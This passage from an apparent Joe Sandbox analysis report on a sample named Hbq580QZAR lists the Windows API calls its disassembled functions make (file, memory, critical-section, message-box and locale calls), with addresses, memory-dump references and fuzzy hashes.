                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8), ref: 00409AA4
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020824A0), ref: 0040966C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                            • String ID: D
                                                                                            • API String ID: 3356880605-2746444292
                                                                                            • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                            • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 149 4019c3-4019c8 RtlLeaveCriticalSection 145->149 150 4019cd 145->150 148 401983-401995 146->148 148->148 151 401997-4019a6 148->151 149->150 151->145
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                            • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                            • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                            • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                            • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                            • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                            • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                            • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                            • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                            • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                              • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                              • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                              • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                              • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 296031713-0
                                                                                            • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                            • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                            • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                            • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 1948546556-0
                                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                              • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                            • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                            • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                            • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                            • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,02098000,0040AA59,00000000), ref: 004076B3
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
